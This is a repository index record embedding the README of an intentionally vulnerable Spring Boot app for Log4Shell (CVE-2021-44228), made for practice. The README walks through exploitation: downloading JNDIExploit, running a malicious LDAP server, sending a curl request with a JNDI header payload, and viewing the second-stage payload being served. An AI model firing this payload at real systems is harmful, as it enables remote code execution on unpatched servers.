{"id":13834981,"url":"https://github.com/christophetd/log4shell-vulnerable-app","last_synced_at":"2025-04-08T10:13:59.915Z","repository":{"id":37452779,"uuid":"436974241","full_name":"christophetd/log4shell-vulnerable-app","owner":"christophetd","description":"Spring Boot web application vulnerable to Log4Shell (CVE-2021-44228).","archived":false,"fork":false,"pushed_at":"2024-04-26T03:16:26.000Z","size":258,"stargazers_count":1117,"open_issues_count":1,"forks_count":540,"subscribers_count":22,"default_branch":"main","last_synced_at":"2025-04-01T09:19:46.318Z","etag":null,"topics":["log4shell"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/christophetd.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"christophetd"}},"created_at":"2021-12-10T12:38:20.000Z","updated_at":"2025-03-31T12:55:31.000Z","dependencies_parsed_at":"2024-01-15T18:58:45.953Z","dependency_job_id":"a70ae4c7-d7a7-41d7-8ee1-f959204b4954","html_url":"https://github.com/christophetd/log4shell-vulnerable-app","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/christophetd%2Flog4shell-vulnerable-app","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/christophetd%2Flog4shell-vulnerable-app/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/christophetd%2Flog4shell-vulnerable-app/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/christophetd%2Flog4shell-vulnerable-app/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/christophetd","download_url":"https://codeload.github.com/christophetd/log4shell-vulnerable-app/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247819933,"owners_count":21001394,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["log4shell"],"created_at":"2024-08-04T14:00:54.528Z","updated_at":"2025-04-08T10:13:59.886Z","avatar_url":"https://github.com/christophetd.png","language":"Java","funding_links":["https://github.com/sponsors/christophetd"],"categories":["Examples \u0026 Proofs of Concept","Java"],"sub_categories":[],"readme":"# Log4Shell sample vulnerable application (CVE-2021-44228)\n\nThis repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed [Log4Shell](https://www.lunasec.io/docs/blog/log4j-zero-day/).\n\nIt uses Log4j 2.14.1 (through `spring-boot-starter-log4j2` 2.6.1) and the JDK 1.8.0_181.\n\n![](./screenshot.png)\n\n## Running the application\n\nRun it:\n\n```bash\ndocker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929\n```\n\n## Exploitation steps\n\n*Note: This is highly inspired from the original [LunaSec advisory](https://www.lunasec.io/docs/blog/log4j-zero-day/). **Run at your own risk, preferably in a VM in a sandbox environment**.*\n\n**Update (Dec 13th)**: *The JNDIExploit repository has been removed from GitHub (presumably, [not by GitHub](https://twitter.com/_mph4/status/1470343429599211528))... \n[Click Here](http://web.archive.org/web/20211211031401/https://objects.githubusercontent.com/github-production-release-asset-2e65be/314785055/a6f05000-9563-11eb-9a61-aa85eca37c76?X-Amz-Algorithm=AWS4-HMAC-SHA256\u0026X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20211211%2Fus-east-1%2Fs3%2Faws4_request\u0026X-Amz-Date=20211211T031401Z\u0026X-Amz-Expires=300\u0026X-Amz-Signature=140e57e1827c6f42275aa5cb706fdff6dc6a02f69ef41e73769ea749db582ce0\u0026X-Amz-SignedHeaders=host\u0026actor_id=0\u0026key_id=0\u0026repo_id=314785055\u0026response-content-disposition=attachment%3B%20filename%3DJNDIExploit.v1.2.zip\u0026response-content-type=application%2Foctet-stream) to Download the version cached by the Wayback Machine.*\n\n* Use [JNDIExploit](https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2) to spin up a malicious LDAP server\n\n```bash\nwget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip\nunzip JNDIExploit.v1.2.zip\njava -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888\n```\n\n* Then, trigger the exploit using:\n\n```bash\n# will execute 'touch /tmp/pwned'\ncurl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'\n```\n\n* Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:\n\n```\n[+] LDAP Server Start Listening on 1389...\n[+] HTTP Server Start Listening on 8888...\n[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo\n[+] Paylaod: command\n[+] Command: touch /tmp/pwned\n\n[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload\n[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class\n[+] New HTTP Request From /192.168.1.143:50119  /Exploitjkk87OnvOH.class\n[+] Receive ClassRequest: Exploitjkk87OnvOH.class\n[+] Response Code: 200\n```\n\n* To confirm that the code execution was successful, notice that the file `/tmp/pwned.txt` was created in the container running the vulnerable application:\n\n```\n$ docker exec vulnerable-app ls /tmp\n...\npwned\n...\n```\n\n## Reference\n\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\nhttps://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/\n\n## Contributors\n\n[@christophetd](https://twitter.com/christophetd)\n[@rayhan0x01](https://twitter.com/rayhan0x01)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchristophetd%2Flog4shell-vulnerable-app","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fchristophetd%2Flog4shell-vulnerable-app","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchristophetd%2Flog4shell-vulnerable-app/lists"}